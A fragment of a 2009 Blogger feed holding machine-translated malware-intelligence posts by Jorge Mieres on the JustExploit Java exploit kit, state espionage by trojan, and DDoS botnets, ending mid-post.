href="http://www.virustotal.com/analisis/db16ba4b3029244b4d900648e443a3f0c71bef835987c44476d1f3817a1c629d-1259397689"&gt;example.pdf&lt;/a&gt; &lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;8&lt;/span&gt;/41 (19.51%)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/8ffbedb2625593624b890ed5f27026bcdc8dae793a57bf0e6f724fb52d55934a-1259300302"&gt;annonce.pdf&lt;/a&gt; &lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;7&lt;/span&gt;/41 (17.07%)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/e44008b3b463339e28238a3362712a0c224d2505502d504c753ecd05c33ff09e-1259429191"&gt;load.exe&lt;/a&gt; &lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;25&lt;/span&gt;/41 (60.98%)&lt;/span&gt;&lt;br /&gt; &lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;This activity is In-the-Wild relatively short time ago and is a dangerous attack vector that is actively being used by botmasters, as we have seen, with striking effectiveness.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/ddos-botnet-nuevo-crimeware-de.html"&gt;DDoS Botnet. Nuevo crimeware de propósito particul...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/t-iframer-kit-para-la-inyeccion-de.html"&gt;T-IFRAMER. Kit para la inyección de malware In-the...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/zopack-nueva-alternativa-para-la.html"&gt;ZoPAck. Nueva alternativa para la explotación de v...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/zeus-botnet-y-su-poder-de-reclutamiento.html"&gt;ZeuS Botnet y su poder de reclutamiento zombi&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/eleonore-exploits-pack-nueva-crimeware.html"&gt;Eleonore Exploits Pack. Nuevo crimeware In-the-Wild&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/mirando-de-cerca-la-estructura-de.html"&gt;Mirando de cerca la estructura de Unique Sploits Pack&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/04/adrenalin-botnet-zona-de-comando-el.html"&gt;Adrenaline botnet: zona de comando. El crimeware ruso...&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/04/yes-exploit-system-otro-crimeware-made.html"&gt;YES Exploit System. Otro crimeware made in Rusia&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/barracuda-bot-botnet-activamente.html"&gt;Barracuda Bot. Botnet activamente explotada&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/elfiesta-reclutamiento-zombi-traves-de.html"&gt;ElFiesta. Reclutamiento zombi a través de múltiples amenazas&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-7429120586945618757?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/7429120586945618757/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=7429120586945618757' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7429120586945618757'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/7429120586945618757'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/justexploit-new-exploit-kit-that-uses.html' title='JustExploit. New Exploit kit that uses vulnerabilities in Java'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Ppq0fEGkHo4/SxMO_UvIAqI/AAAAAAAAB-w/L8oZDgwpDYg/s72-c/mipistus-justexploit.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1893762414546026199</id><published>2009-11-24T01:06:00.001-11:00</published><updated>2009-11-24T13:37:59.778-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='CYBINT'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Intelligence'/><title type='text'>Espionage by malware</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="Durante este mes recuerdo haber desayunado con una noticia que para muchos medios de información parecería ser novedoso o exclusivamente ligado con algunas películas de Hollywood, dándole una connotación de &amp;quot;sorprendente&amp;quot;. Me refiero al  espionaje a través de medios informáticos ."&gt;During this month remember having breakfast with a piece of news for many media seem to be new or exclusively connected with some Hollywood films, giving it a connotation of "amazing." I refer to &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.haaretz.com/hasen/spages/1125312.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Durante este mes recuerdo haber desayunado con una noticia que para muchos medios de información parecería ser novedoso o exclusivamente ligado con algunas películas de Hollywood, dándole una connotación de &amp;quot;sorprendente&amp;quot;. Me refiero al  espionaje a través de medios informáticos ."&gt;espionage through computerized&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Durante este mes recuerdo haber desayunado con una noticia que para muchos medios de información parecería ser novedoso o exclusivamente ligado con algunas películas de Hollywood, dándole una connotación de &amp;quot;sorprendente&amp;quot;. Me refiero al  espionaje a través de medios informáticos ."&gt; means.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="display: inline;" title="A continuación dejo una captura de esa noticia, en la cual se deja en evidencia que los códigos maliciosos también forman parte de las operaciones de  Inteligencia  en diferentes contextos,  tanto desde un punto de vista netamente fraudulento (en el caso de los delincuentes informáticos) como en el que se escuda bajo la &amp;quot;bandera&amp;quot; de proteger y resguardar los intereses de un Estado (el caso de muchos servicios de Inteligencia), que buscan sacar ventajas y/o neutralizar las potenciales acciones encuadradas dentro de su marco de hostilidad."&gt;Then leave a screenshot of the news, in which it's evident that the malicious code are also part of the operations of &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="A continuación dejo una captura de esa noticia, en la cual se deja en evidencia que los códigos maliciosos también forman parte de las operaciones de  Inteligencia  en diferentes contextos,  tanto desde un punto de vista netamente fraudulento (en el caso de los delincuentes informáticos) como en el que se escuda bajo la &amp;quot;bandera&amp;quot; de proteger y resguardar los intereses de un Estado (el caso de muchos servicios de Inteligencia), que buscan sacar ventajas y/o neutralizar las potenciales acciones encuadradas dentro de su marco de hostilidad."&gt;intelligence&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="A continuación dejo una captura de esa noticia, en la cual se deja en evidencia que los códigos maliciosos también forman parte de las operaciones de  Inteligencia  en diferentes contextos,  tanto desde un punto de vista netamente fraudulento (en el caso de los delincuentes informáticos) como en el que se escuda bajo la &amp;quot;bandera&amp;quot; de proteger y resguardar los intereses de un Estado (el caso de muchos servicios de Inteligencia), que buscan sacar ventajas y/o neutralizar las potenciales acciones encuadradas dentro de su marco de hostilidad."&gt; in different contexts, &lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwmWnWHZgaI/AAAAAAAAB9Y/HTiXkioR9_A/s1600/report-esp-mal.png#googtrans/es/en"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 228px; height: 320px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwmWnWHZgaI/AAAAAAAAB9Y/HTiXkioR9_A/s320/report-esp-mal.png" alt="" id="BLOGGER_PHOTO_ID_5407018430330667426" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="A continuación dejo una captura de esa noticia, en la cual se deja en evidencia que los códigos maliciosos también forman parte de las operaciones de  Inteligencia  en diferentes contextos,  tanto desde un punto de vista netamente fraudulento (en el caso de los delincuentes informáticos) como en el que se escuda bajo la &amp;quot;bandera&amp;quot; de proteger y resguardar los intereses de un Estado (el caso de muchos servicios de Inteligencia), que buscan sacar ventajas y/o neutralizar las potenciales acciones encuadradas dentro de su marco de hostilidad."&gt;both from a viewpoint clearly fraudulent (in the case of computer criminals) as which shields under the "flag" to protect and safeguard the interests of a State (for many intelligence services), which seek to take advantage and/or neutralize the potential actions framed within the context of hostility.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Incluso, en muchos casos, rozando la legalidad de las acciones."&gt;Indeed, in many cases, touching the legality of actions.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Según la información que se manifiesta en el artículo, el servicio de Inteligencia más importante de Israel ( Mossad ) ha utilizado un código malicioso del tipo troyano para obtener información confidencial y critica sobre instalaciones nucleares en Siria."&gt;According to the information that appears in the article, the most important intelligence service of Israel&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Según la información que se manifiesta en el artículo, el servicio de Inteligencia más importante de Israel ( Mossad ) ha utilizado un código malicioso del tipo troyano para obtener información confidencial y critica sobre instalaciones nucleares en Siria."&gt; (Mossad)&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Según la información que se manifiesta en el artículo, el servicio de Inteligencia más importante de Israel ( Mossad ) ha utilizado un código malicioso del tipo troyano para obtener información confidencial y critica sobre instalaciones nucleares en Siria."&gt; has used a type of malicious code trojan to obtain confidential information and critiques on nuclear facilities in Syria.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt;The fact that Mossad used a program to spy isn't a novelty because, like its American counterpart &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt;(CIA)&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt; and many other formerly used &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.harrymagazine.com/200510/promis.htm#googtrans/es/en"&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt;Promis&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt; as a resource for &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt;spying.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="El hecho de que el Mossad utilizara un programa para hacer espionaje tampoco es una novedad ya que, al igual que su equivalente estadounidense ( CIA)  y muchos otros, antiguamente ha utilizado  Promis  como recurso de  espionaje ."&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="(Algún día quizás me anime a escribir algo sobre los programas utilizados por los servicios de Inteligencia de todo el mundo ;P)"&gt;(Someday maybe encourage me to write something about the programs used by intelligence services around the world ;P)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="La cuestión es que independientemente de la repercusión de la noticia, los códigos maliciosos son sin lugar a dudas uno de los programas más empleados para la obtención de información, también a nivel gubernamental y militar; incluso, entre compañías que buscan obtener datos confidenciales que permitan revelar las actividades de su competencia y ganar ventajas."&gt;The point is that regardless of the impact of the news, malicious code are without doubt one of the most used for obtaining information, including at government and military, even among companies seeking to obtain confidential data that enable disclose their activities and win competition advantages.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt;Now, any organization or government entity may be a victim of espionage, and these activities must also be addressed by &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt;Information&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt; &lt;span style="font-weight: bold;"&gt;Security&lt;/span&gt;. So what can be done to counteract or neutralize these activities, which in most cases are handled on the edge of illegality, the truth isn't easy. However, implementing a strategy of &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt;misinformation&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt; can be a good practice of &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt;counterintelligence.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Ahora, cualquier organización o ente gubernamental puede ser víctima del espionaje informático, y estas actividades también deben ser atendidas por  Seguridad de la Información . Entonces, qué se puede hacer para contrarrestar o neutralizar estas actividades, que en la mayoría de los casos se manejan al borde de lo ilegal, la verdad es que no es nada fácil. Sin embargo, aplicar una estrategia de  desinformación  puede ser una buena práctica de  contraespionaje ."&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="En definitiva es fácil deducir que este tipo de maniobras no son sólo acciones catalogadas como &amp;quot;fantasmas&amp;quot; o dentro del género &amp;quot;ciencia ficción&amp;quot; propias de las películas, sino que cotidianamente somos potenciales víctimas de los intentos persistentes de los desarrolladores de malware que buscan romper nuestros esquemas de seguridad para obtener información secreta."&gt;Ultimately it's easy to deduce that such maneuvers aren't only stock listed as "ghosts" or within the genre "science fiction" films themselves, but every day we are potential victims of the persistent attempts of malware writers seeking to break our security frameworks to obtain secret information.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Información relacionada"&gt;Related information&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/inteligencia-informatica-seguridad-de.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Inteligencia informática, Seguridad de la Información y Ciber-Guerra"&gt;Computer Intelligence, Information Security and Cyber-War&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/cybint-en-el-negocio-de-los-ciber.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="CYBINT en el negocio de los ciber-delincuentes rusos"&gt;CYBINT in the business of Russian cyber-crooks&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Jorge Mieres"&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1893762414546026199?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1893762414546026199/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1893762414546026199' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1893762414546026199'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1893762414546026199'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/espionage-by-malware.html' title='Espionage by malware'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Ppq0fEGkHo4/SwmWnWHZgaI/AAAAAAAAB9Y/HTiXkioR9_A/s72-c/report-esp-mal.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-4948618034835199038</id><published>2009-11-23T05:19:00.003-11:00</published><updated>2009-11-23T05:19:00.431-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ddos'/><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Crimeware'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>DDoS Botnet. New crimeware particular purpose</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="Un ataque de  Denegación de Servicio  ( DoS ) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total."&gt;An attack by &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Un ataque de  Denegación de Servicio  ( DoS ) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total."&gt;Denial of Service&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Un ataque de  Denegación de Servicio  ( DoS ) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total."&gt; (&lt;span style="font-weight: bold;"&gt;DoS&lt;/span&gt;) consists basically of abuse of a service or resource by successive requests, either intentional or negligent, which eventually break the availability of such service or resource temporarily or completely.&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Un ataque de  Denegación de Servicio  ( DoS ) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total."&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Un ataque de  Denegación de Servicio  ( DoS ) consiste, básicamente, en abusar de un servicio o recurso haciendo peticiones sucesivas, ya sea de forma dolosa o culposa, que terminan por quebrar la disponibilidad de ese servicio o recurso de forma temporal o total."&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de  Denegación de Servicio Distribuida  ( DDoS )."&gt;When this type of attack is performed using the processing power of an important set of computers carrying out the abuse of requests synchronously, we are witnessing an attack &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de  Denegación de Servicio Distribuida  ( DDoS )."&gt;Distributed Denial of Service&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de  Denegación de Servicio Distribuida  ( DDoS )."&gt; (&lt;span style="font-weight: bold;"&gt;DDoS&lt;/span&gt;).&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de  Denegación de Servicio Distribuida  ( DDoS )."&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Cuando este tipo de ataques se realiza empleando el poder de procesamiento de un conjunto importante de computadoras realizando el abuso de peticiones de forma sincronizada, estamos en presencia de un ataque de  Denegación de Servicio Distribuida  ( DDoS )."&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Los ataques de DDoS no constituyen una novedad en la actualidad ( códigos maliciosos como Blaster, diseñado para realizar este tipo de ataques contra Microsoft en el 2003, es un ejemplo clásico ) y su empleo es un recurso de cualquier actividad con connotación maliciosa, incluso, mafiosa."&gt;DDoS attacks aren't new at present &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="Los ataques de DDoS no constituyen una novedad en la actualidad ( códigos maliciosos como Blaster, diseñado para realizar este tipo de ataques contra Microsoft en el 2003, es un ejemplo clásico ) y su empleo es un recurso de cualquier actividad con connotación maliciosa, incluso, mafiosa."&gt;(such as Blaster malicious code designed for this kind of attacks against Microsoft in 2003, is a classic &lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Los ataques de DDoS no constituyen una novedad en la actualidad ( códigos maliciosos como Blaster, diseñado para realizar este tipo de ataques contra Microsoft en el 2003, es un ejemplo clásico ) y su empleo es un recurso de cualquier actividad con connotación maliciosa, incluso, mafiosa."&gt;&lt;span style="font-style: italic;"&gt;example&lt;/span&gt;) and their use is a resource of any malicious activity connotation, even mafia.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="En este sentido, la mayoría de las  botnets  de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las  zombis  que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad."&gt;In this sense, most &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="En este sentido, la mayoría de las  botnets  de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las  zombis  que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad."&gt;botnets&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="En este sentido, la mayoría de las  botnets  de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las  zombis  que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad."&gt; general purpose contemplated as part of its bid criminal attacks distributed denial of service by taking advantage of benefits offered by the &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="En este sentido, la mayoría de las  botnets  de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las  zombis  que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad."&gt;zombies&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="En este sentido, la mayoría de las  botnets  de propósito general contemplan como parte de su oferta delictiva, ataques de Denegación de Servicio Distribuida aprovechando las bondades que ofrecen las  zombis  que forman parte de la red, y las de propósito particular destinadas a realizar un tipo de ataque específico contra un objetivo también específico, son el ejemplo de la actualidad."&gt; that are part of the network, and the particular purpose to perform a type specific attack against a specific target also, is typical of today.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt;From a perspective on cyber war, the DDoS also plays a fundamental role in the offensive mode used in this digital war also known as &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/inteligencia-informatica-seguridad-de.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt;Cyber-Warfare&lt;/span&gt;&lt;/a&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt;, and is a resource that is part of a strategy involved in the attack analysis&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt; &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/cybint-en-el-negocio-de-los-ciber.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt;CYBINT&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt; (&lt;span style="font-weight: bold;"&gt;Cyber&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple 